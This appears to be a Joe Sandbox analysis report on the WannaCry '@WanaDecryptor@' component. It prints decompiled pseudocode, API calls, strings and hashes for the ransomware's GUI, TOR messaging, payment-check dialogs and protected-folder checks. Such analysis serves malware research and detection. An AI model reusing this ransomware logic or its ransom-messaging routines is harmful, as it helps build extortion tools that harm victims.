							_v20 = 9;
							L00412E18();
							_push(_t106);
							_v32 = 0xa;
							L00412D9A();
							_v36 = 9;
							L00412CC2();
							_v36 = 8;
							L00412CC2();
							_v36 = 0xffffffff;
							L00412CC2();
							goto L33;
						}
						_push( *(_t208 + 0x74));
						_push( &_v36);
						L00412E1E();
						_v12 = 5;
						_t109 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8) -  *(_t208 + 0x74);
						_push(_t109);
						_push( &_v36);
						L00412E24();
						_push(_t109);
						_t110 =  &_v52;
						_push(_t110);
						_push( &_v40);
						_v20 = 6;
						L00412E18();
						_push(_t110);
						_v32 = 7;
						L00412D9A();
						_v36 = 6;
						L00412CC2();
						_v36 = 5;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
						goto L33;
					}
					_t163 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
					_t113 =  *(__ecx + 0x74) * _t182;
					__eflags = _t163 - _t113;
					if(_t163 >= _t113) {
						goto L15;
					}
					_t114 = _t113 - _t163;
					__eflags = _t114;
					if(_t114 <= 0) {
						goto L15;
					}
					_t130 = _t114;
					do {
						_push( *((intOrPtr*)(__ecx + 0x40)));
						L00412E36();
						_t130 = _t130 - 1;
						__eflags = _t130;
					} while (_t130 != 0);
					goto L15;
				}
				if( *((intOrPtr*)(__ecx + 0x4b)) != _t182) {
					L6:
					_t205 = _t208 + 0x44;
					if( *(_t208 + 0x78) != 0) {
						_t117 =  *((intOrPtr*)( *_t205 - 8)) - 1;
						_push(_t117);
						_push( &_v36);
						L00412E24();
						_t118 =  &_v36;
						_push(1);
						_push(_t118);
						_v12 = 2;
						L00412E1E();
						_push(_t117);
						_push(_t118);
						_push( &_v40);
						_v20 = 3;
						L00412E18();
						_push(_t118);
						_v32 = 4;
						L00412D9A();
						_v36 = 3;
						L00412CC2();
						_v36 = 2;
						L00412CC2();
						_v36 = 0xffffffff;
						L00412CC2();
					} else {
						_push(1);
						_push( &_v24);
						_t119 =  *((intOrPtr*)( *_t205));
						_v36 = _t119;
						L00412E30();
						_v12 = 0;
						_push(_v44);
						_push(_t119);
						_t120 =  &_v36;
						_push(_t120);
						L00412E2A();
						_push(_t120);
						_v24 = 1;
						L00412D9A();
						_v28 = 0;
						L00412CC2();
						_v28 = 0xffffffff;
						L00412CC2();
					}
					goto L33;
				}
				_t179 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x44)) - 8));
				_t122 =  *(__ecx + 0x74);
				if(_t179 >= _t122) {
					goto L6;
				}
				_t123 = _t122 - _t179;
				if(_t123 <= 0) {
					goto L6;
				}
				_t132 = _t123;
				do {
					_push( *((intOrPtr*)(__ecx + 0x40)));
					L00412E36();
					_t132 = _t132 - 1;
				} while (_t132 != 0);
				goto L6;
			}

APIs

#940.MFC42(?), ref: 0040527D
#4277.MFC42(?,00000001), ref: 004052A0
#923.MFC42(?,00000000,?), ref: 004052B8
#858.MFC42(00000000,?,00000000,?), ref: 004052C5
#800.MFC42(00000000,?,00000000,?), ref: 004052D3
#800.MFC42(00000000,?,00000000,?), ref: 004052E4
#4129.MFC42(?,?), ref: 004052FC
#5710.MFC42 ref: 00405314
#922.MFC42(?,00000000,00000000), ref: 00405326
#858.MFC42(00000000,?,00000000,00000000), ref: 00405333
#800.MFC42(00000000,?,00000000,00000000), ref: 00405340
#800.MFC42(00000000,?,00000000,00000000), ref: 0040534E
#800.MFC42(00000000,?,00000000,00000000), ref: 0040535F
#940.MFC42(?), ref: 00405396
#5710.MFC42(?,?), ref: 004053B8
#4129.MFC42(?,?,?,?), ref: 004053D7
#922.MFC42(?,?,00000000,?,?,?,?), ref: 004053ED
#858.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 004053FA
#800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405407
#800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405415
#800.MFC42(00000000,?,?,00000000,?,?,?,?), ref: 00405426
#4129.MFC42(?,?), ref: 00405443
#4277.MFC42(?,?,?,?), ref: 0040545B
#922.MFC42(?,00000000,?,?,?,?,?), ref: 00405471
#858.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040547E
#800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 0040548B
#800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 00405499
#800.MFC42(00000000,?,00000000,?,?,?,?,?), ref: 004054AA
#6778.MFC42(?,00000001), ref: 004054EA
#6648.MFC42(00000000,00000001,?,00000001), ref: 004054F4
#6778.MFC42(00000000,?), ref: 00405536
#6648.MFC42(?,00000001,00000000,?), ref: 00405545
InvalidateRect.USER32(?,00000000,00000001), ref: 0040555A

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$#858$#4129#922$#4277#5710#6648#6778#940$#923InvalidateRect
String ID:
API String ID: 2121400562-0
Opcode ID: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
Instruction ID: 4ea7c19ebb0ecad4eacefd8b4ebc091e45acf9db756171f3a68d6c32b1a6cadd
Opcode Fuzzy Hash: b4a9873a0028e0a5de6b54efbba54189251206de77b36b87668466cc29092242
Instruction Fuzzy Hash: A4A1B770204B81AFC714DB29C590A6FB7E6EFD4304F040A1EF596D3391D7B8E8558B66

Uniqueness

Uniqueness Score: -1.00%

Function 004082C0 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 181
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004082C0(void* __ecx) {
				void* __ebp;
				signed int _t44;
				void* _t45;
				void* _t47;
				signed int _t48;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;
				signed int _t65;
				signed int _t90;
				signed int _t91;
				signed int _t104;
				intOrPtr* _t106;
				struct _IO_FILE* _t107;
				signed int _t108;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				void* _t116;
				void* _t118;
				void* _t120;

				_push(0xffffffff);
				_push(E00413FCE);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t114;
				_t115 = _t114 - 0x8c;
				_t111 = __ecx;
				 *((intOrPtr*)(_t115 + 0xa4)) = 0;
				_t44 =  *( *((intOrPtr*)(_t115 + 0xac)) - 8);
				if(_t44 > 0x3e8) {
					_push(0x3e8);
					_push(0);
					_push(_t115 + 0x14);
					L00412F6E();
					_push(_t44);
					 *((char*)(_t115 + 0xa8)) = 1;
					L00412D9A();
					 *((char*)(_t115 + 0xa4)) = 0;
					L00412CC2();
				}
				if( *( *((intOrPtr*)(_t115 + 0xac)) - 8) >= 0xa) {
					_t106 = __imp__time;
					_t45 =  *_t106(0);
					_t90 =  *0x4218a8; // 0x0
					_t116 = _t115 + 4;
					__eflags = _t45 - _t90 - 0xb4;
					if(_t45 - _t90 >= 0xb4) {
						L13:
						_t47 =  *_t106(0);
						_t91 =  *0x4218a8; // 0x0
						_t116 = _t116 + 4;
						_t48 = _t47 - _t91;
						__eflags = _t48 - 0xe10;
						if(_t48 <= 0xe10) {
							L9:
							__eflags =  *0x4218ac - 3; // 0x0
							if(__eflags < 0) {
								L15:
								 *((intOrPtr*)(_t116 + 0x14)) = 0;
								memset(_t116 + 0x18, 0, 0x21 << 2);
								_t51 = fopen("00000000.res", "rb");
								_t107 = _t51;
								_t118 = _t116 + 0x14;
								__eflags = _t107;
								if(_t107 != 0) {
									fread(_t118 + 0x1c, 0x88, 1, _t107);
									fclose(_t107);
									E0040BE90("s.wnry", _t111 + 0x6ea, _t111 + 0x74e);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0xcc)));
									_push(_t118 + 0x38);
									_push(_t111 + 0x5f0);
									_t56 = E0040C060( *((intOrPtr*)(_t118 + 0xcc)), __eflags);
									_t118 = _t118 + 0x30;
									_t108 = _t56;
									E0040C670();
									_t58 =  *(_t118 + 0xb0);
									__eflags = _t108;
									if(_t108 < 0) {
										__eflags = _t58;
										if(_t58 != 0) {
											_push(0);
											_push(0x30);
											_push("Failed to send your message!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
											L00412CC8();
										}
									} else {
										__eflags = _t58;
										if(_t58 != 0) {
											L00412CC8();
											__imp__time(0, "Your message has been sent successfully!", 0x40, 0);
											_t118 = _t118 + 4;
											 *0x4218a8 = _t58;
										}
									}
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t108;
								} else {
									 *((intOrPtr*)(_t118 + 0xa4)) = 0xffffffff;
									L00412CC2();
									_t59 = _t51 | 0xffffffff;
								}
								L23:
								 *[fs:0x0] =  *((intOrPtr*)(_t118 + 0x9c));
								return _t59;
							}
							__eflags =  *(_t116 + 0xb0);
							if( *(_t116 + 0xb0) != 0) {
								L00412DA6();
								 *((char*)(_t116 + 0xa8)) = 2;
								_t60 =  *_t106(0);
								_t104 =  *0x4218a8; // 0x0
								_t120 = _t116 + 4;
								__eflags = 0x3d;
								_push(0x3d - ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5) + ((0x88888889 * (_t60 - _t104) >> 0x20) + _t60 - _t104 >> 5 >> 0x1f));
								_push("You are sending too many mails! Please try again %d minutes later.");
								_push(_t120 + 0x10);
								L00412E00();
								_t48 =  *(_t120 + 0x1c);
								_t116 = _t120 + 0xc;
								_push(0);
								_push(0);
								_push(_t48);
								L00412CC8();
								 *((char*)(_t116 + 0xa4)) = 0;
								L00412CC2();
							}
							 *((intOrPtr*)(_t116 + 0xa4)) = 0xffffffff;
							L00412CC2();
							_t59 = _t48 | 0xffffffff;
							goto L23;
						}
						 *0x4218ac = 0;
						goto L15;
					}
					_t65 =  *0x4218ac; // 0x0
					__eflags = _t65 - 3;
					if(_t65 >= 3) {
						goto L13;
					}
					_t48 = _t65 + 1;
					__eflags = _t48;
					 *0x4218ac = _t48;
					goto L9;
				}
				if( *((intOrPtr*)(_t115 + 0xb0)) != 0) {
					_push(0);
					_push(0);
					_push("Too short message!");
					L00412CC8();
				}
				 *((intOrPtr*)(_t115 + 0xa4)) = 0xffffffff;
				L00412CC2();
				_t59 = _t44 | 0xffffffff;
				goto L23;
			}

APIs

#4278.MFC42(000003E8,00000000,000003E8,?,?,760D5C80), ref: 0040830D
#858.MFC42 ref: 00408322
#800.MFC42 ref: 00408332
#1200.MFC42(Too short message!,00000000,00000000,?,?,760D5C80), ref: 00408354
#800.MFC42 ref: 0040836B
time.MSVCRT ref: 0040837F
#540.MFC42 ref: 004083C8
time.MSVCRT ref: 004083D6
#2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
#1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
#800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
#800.MFC42 ref: 00408440
time.MSVCRT ref: 0040844E
fopen.MSVCRT ref: 00408487
#800.MFC42 ref: 004084A8
fread.MSVCRT ref: 004084C2
fclose.MSVCRT ref: 004084C9
#1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
time.MSVCRT ref: 00408528
#1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
#800.MFC42 ref: 0040855B

Strings

You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
Too short message!, xrefs: 0040834F
00000000.res, xrefs: 00408480
s.wnry, xrefs: 004084DD
Your message has been sent successfully!, xrefs: 0040851D
Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$#1200time$#2818#4278#540#858fclosefopenfread
String ID: 00000000.res$Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!$Too short message!$You are sending too many mails! Please try again %d minutes later.$Your message has been sent successfully!$s.wnry
API String ID: 1233543560-382338106
Opcode ID: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
Opcode Fuzzy Hash: 6aef2977620d67d742a0f30d3b6c329b2d4c4f80cce0edf1bcad665571c82898
Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB

Uniqueness

Uniqueness Score: -1.00%

Function 004086E0 Relevance: 40.6, APIs: 20, Strings: 3, Instructions: 324
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
				struct HBRUSH__* _v8;
				char _v16;
				char _v28;
				intOrPtr _v36;
				char _v52;
				char _v76;
				char _v88;
				intOrPtr _v120;
				intOrPtr _v124;
				struct HDC__* _v128;
				signed int _v132;
				void* _v136;
				char _v144;
				signed int _v148;
				struct HBRUSH__* _v152;
				intOrPtr _v156;
				struct HBRUSH__* _v160;
				char _v164;
				void* _v168;
				long _v172;
				char _v176;
				char _v180;
				struct tagRECT _v196;
				intOrPtr _v200;
				char* _v204;
				signed int _v208;
				signed int _v212;
				char _v216;
				intOrPtr _v220;
				char _v224;
				char _v228;
				struct HBRUSH__* _v232;
				intOrPtr _v236;
				char _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				struct HDC__* _v252;
				char _v256;
				struct HBRUSH__* _v260;
				struct HBRUSH__* _v264;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				struct HBRUSH__* _v284;
				struct HBRUSH__* _v288;
				char _v292;
				intOrPtr _v300;
				char _v324;
				signed int _t146;
				intOrPtr _t148;
				signed int _t150;
				void* _t152;
				intOrPtr _t155;
				char _t163;
				char* _t165;
				RECT* _t177;
				struct HBRUSH__* _t182;
				intOrPtr _t206;
				signed int _t276;
				intOrPtr _t277;
				intOrPtr* _t281;
				void* _t283;
				long _t284;
				intOrPtr _t286;
				intOrPtr _t291;
				signed long long _t299;
				signed long long _t301;
				signed long long _t303;

				_t299 = __fp0;
				_t283 = __ebp;
				_push(0xffffffff);
				_push(E00414055);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_t281 = __ecx;
				_push(__ecx);
				L00412DD0();
				_v8 = 0;
				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
				_push( &_v164);
				_push( &_v168);
				L00412FFE();
				L00412E54();
				_v16 = 1;
				E00407640( &_v240);
				_v240 = 0x41675c;
				_t206 = _v120;
				_t146 = 0 | _t206 == 0x00000000;
				_v16 = 2;
				_v256 = 0x4166e0;
				_v228 =  &_v132;
				_v232 = 0;
				_v208 = _t146;
				if(_t146 == 0) {
					_v244 = _t206;
					_v248 = _v124;
					_v252 = _v128;
				} else {
					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
					asm("sbb eax, eax");
					_push(CreateCompatibleDC( ~( &_v136) & _v132));
					L00412E4E();
					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
					_t35 =  &_v264; // 0x41675c
					_v260 = E00409F10( &_v280, _t35);
					_push(_v248);
					_push(_v252);
					_push( &_v76);
					L00412FF8();
				}
				_v16 = 3;
				_v204 =  &_v256;
				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
				_t291 = _t148;
				if(_t291 == 0) {
					_push( *((intOrPtr*)(_t281 + 0x58)));
					_push( &_v196);
					L00412FF2();
				} else {
					if(_t291 != 0) {
						_t182 =  *(_t148 + 4);
					} else {
						_t182 = 0;
					}
					FillRect(_v252,  &_v196, _t182);
				}
				_push(_t281 + 0x74);
				L00412FEC();
				_t150 = _v196.top;
				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
					_v268 = 0x4166e0;
					_v28 = 5;
					if(_v220 == 0) {
						_v260 = 0;
						_v264 = 0;
					} else {
						_t153 = _v232;
						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
						_t155 = _v276;
						if(_t155 != 0) {
							_push( *((intOrPtr*)(_t155 + 4)));
							_push(_v264);
							L00412E48();
						} else {
							_push(0);
							_push(_v264);
							L00412E48();
						}
					}
					_v28 = 4;
				} else {
					L00412FE6();
					_v212 = _t150;
					_t276 = _t150 & 0x00008000;
					_v148 = _t150 & 0x00002000;
					_v180 = 0;
					_v176 = 0;
					_v168 = 0;
					_v164 = 0;
					_v160 = 0;
					_v152 = 0;
					if((_t150 & 0x00000004) == 0) {
						_v156 = _v200 - _v208;
					} else {
						_v156 = _v196.left - _v204;
					}
					asm("fild dword [esp+0x80]");
					_push(_t283);
					_t284 = _v196.right.left;
					_t163 = _v196.top - _t284;
					_v272 = _v196.bottom - _t284;
					asm("fild dword [esp+0x10]");
					_v272 = _t163;
					asm("fild dword [esp+0x10]");
					_t301 = _t299 * st2 / st1;
					L0041304A();
					_v172 = _t163;
					if(_t276 == 0) {
						st0 = _t301;
						st0 = _t301;
					} else {
						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
						asm("fild dword [esp+0x10]");
						_t303 = _t301 * st2 / st1;
						L0041304A();
						st0 = _t303;
						st0 = _t303;
						_v180 = _t163;
					}
					_t277 =  *((intOrPtr*)(_t281 + 0x54));
					if(_t277 == 0) {
						_t165 =  &_v180;
						if(_v148 == 0) {
							_t165 =  &_v164;
						}
						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
					} else {
						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
						if(_t277 != 0) {
							FillRect(_v264, _t177,  *(_t277 + 4));
						} else {
							FillRect(_v264, _t177, 0);
						}
					}
					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
					_v292 = 0x4166e0;
					_v52 = 7;
					if(_v244 == 0) {
						_v284 = 0;
						_v288 = 0;
						_v52 = 6;
					} else {
						_t172 = _v256;
						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
						_t112 =  &_v324; // 0x4166e0
						E00409F10(_t112, _v300);
						_v88 = 6;
					}
				}
				_t133 =  &_v252; // 0x41675c
				_t152 = E00409E20(_t133);
				_v28 = 0;
				L00412E3C();
				_v28 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v36;
				return _t152;
			}

APIs

#470.MFC42 ref: 00408708
GetClientRect.USER32(?,?), ref: 0040871F
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
#6734.MFC42(?,?), ref: 00408746
#323.MFC42(?,?), ref: 0040874F
CreateCompatibleDC.GDI32(?), ref: 004087D2
#1640.MFC42(00000000), ref: 004087DD

Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E

Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D

#6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
FillRect.USER32(?,?,?), ref: 0040887D
#2754.MFC42(?,?), ref: 00408892
#2381.MFC42(?,?,?), ref: 0040889F
#3797.MFC42(?,?,?), ref: 004088C0
_ftol.MSVCRT ref: 00408951
_ftol.MSVCRT ref: 0040896F
FillRect.USER32(?,00000000,00000000), ref: 004089B0
#640.MFC42(?,?,?), ref: 00408B09
#755.MFC42(?,?,?), ref: 00408B20

Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3

Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D

Strings

fA, xrefs: 00408A54
\gA, xrefs: 00408809, 00408811
fA, xrefs: 00408778

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
String ID: \gA$fA$fA
API String ID: 1027735583-2217880857
Opcode ID: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
Opcode Fuzzy Hash: 6ed80f763e045306e10188d4e497fb721b5fce89834b9b0f8741aa09041edacc
Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00402AF0 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 133COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00402AFF
wcsstr.MSVCRT ref: 00402B18
_wcsicmp.MSVCRT ref: 00402B39
_wcsicmp.MSVCRT ref: 00402B53
_wcsicmp.MSVCRT ref: 00402B6D

Strings

This folder protects against ransomware. Modifying it will reduce protection, xrefs: 00402BED
\AppData\Local\Temp, xrefs: 00402BB5
\Local Settings\Temp, xrefs: 00402BCF
\Program Files, xrefs: 00402B81
\Program Files (x86), xrefs: 00402B9B
Content.IE5, xrefs: 00402C21
N(@, xrefs: 00402AF2, 00402AFE, 00402B17
\ProgramData, xrefs: 00402B4D
\WINDOWS, xrefs: 00402B67
Temporary Internet Files, xrefs: 00402C07
\Intel, xrefs: 00402B33

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: _wcsicmp$_wcsnicmpwcsstr
String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
API String ID: 2817753184-2613825984
Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401760 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 140
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401760(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				struct _IO_FILE* _v32;
				void _v2059;
				void _v2060;
				void _v2571;
				void _v2572;
				char _v2576;
				char _v2604;
				void* _v2608;
				char _v2616;
				void* _v2636;
				void* _v2640;
				void* _t36;
				struct _IO_FILE* _t37;
				signed int _t38;
				unsigned int _t45;
				signed int _t49;
				void* _t50;
				signed int _t67;
				struct _IO_FILE* _t87;
				void* _t94;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_push(0xffffffff);
				_push(E004134C6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_t99 = _t98 - 0xa28;
				_t94 = __ecx;
				L00412CD4();
				_t36 =  *(__ecx + 0xac);
				if(_t36 != 0) {
					WaitForSingleObject(_t36, 0xbb8);
					TerminateThread( *(_t94 + 0xac), 0);
					CloseHandle( *(_t94 + 0xac));
				}
				_t37 = E0040C670();
				if( *((intOrPtr*)(_t94 + 0xb4)) != 0) {
					L15:
					 *[fs:0x0] = _v12;
					return _t37;
				} else {
					_t37 =  *(_t94 + 0xa8);
					if(_t37 != 1) {
						if(_t37 != 0xffffffff) {
							if(_t37 != 2) {
								goto L15;
							}
							_push(0);
							_push(0x40);
							_push("Congratulations! Your payment has been checked!\nStart decrypting now!");
							L14:
							L00412CC8();
							goto L15;
						}
						if( *((intOrPtr*)(_t94 + 0xa0)) == 0) {
							L11:
							_push(0);
							_push(0xf0);
							_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
							goto L14;
						}
						_t38 = rand();
						asm("cdq");
						_t37 = _t38 / 3;
						if(_t38 % 3 != 0) {
							goto L11;
						}
						_push(0);
						_push(0x30);
						_push("Failed to check your payment!\nPlease make sure that your computer is connected to the Internet and \nyour Internet Service Provider (ISP) does not block connections to the TOR Network!");
						goto L14;
					}
					_v2572 = 0;
					memset( &_v2571, 0, 0x7f << 2);
					asm("stosw");
					asm("stosb");
					_v2060 = 0;
					memset( &_v2059, 0, 0x1ff << 2);
					asm("stosw");
					asm("stosb");
					sprintf( &_v2604, "%08X.dky", 0);
					_t37 = fopen( &_v2604, "rb");
					_t87 = _t37;
					_t99 = _t99 + 0x2c;
					if(_t87 == 0) {
						_push(0);
						_push(0xf0);
						_push("You did not pay or we did not confirmed your payment!\nPay now if you didn\'t and check again after 2 hours.\n\nBest time to check: 9:00am - 11:00am GMT from Monday to Friday.");
						L00412CC8();
						 *(_t94 + 0xa8) = 0xffffffff;
					} else {
						_t45 = fread( &_v2060, 1, 0x800, _t87);
						fclose(_t87);
						DeleteFileA( &_v2604);
						_t97 =  &_v2060;
						_t67 = _t45 >> 2;
						_t49 = memcpy( &_v2572, _t97, _t67 << 2);
						_push("You have a new message:\n");
						_t50 = memcpy(_t97 + _t67 + _t67, _t97, _t49 & 0x00000003);
						_t99 = _t99 + 0x2c;
						L00412CAA();
						_push( &_v2576);
						_push(_t50);
						_push( &_v2616);
						_v8 = 0;
						L00412CCE();
						_t37 =  *_t50;
						_push(0);
						_push(0x40);
						_push(_t37);
						_v20 = 1;
						L00412CC8();
						_v32 = 0;
						L00412CC2();
						_v32 = 0xffffffff;
						L00412CC2();
					}
					goto L15;
				}
			}

APIs

#6453.MFC42 ref: 00401780
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 00401797
TerminateThread.KERNEL32(?,00000000), ref: 004017A5
CloseHandle.KERNEL32(?), ref: 004017B2
sprintf.MSVCRT ref: 00401811
fopen.MSVCRT ref: 00401821
fread.MSVCRT ref: 00401844
fclose.MSVCRT ref: 0040184D
DeleteFileA.KERNEL32(?), ref: 0040185B
#537.MFC42(You have a new message:), ref: 00401885
#924.MFC42(?,00000000,?,You have a new message:), ref: 0040189C
#1200.MFC42 ref: 004018AF
#800.MFC42 ref: 004018BF
#800.MFC42 ref: 004018D3
#1200.MFC42(You did not pay or we did not confirmed your payment!Pay now if you didn't and check again after 2 hours.Best time to check: 9:00am - 11:00am GMT from Monday to Friday.,000000F0,00000000), ref: 004018E5

Strings

Failed to check your payment!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 00401918
You have a new message:, xrefs: 00401877
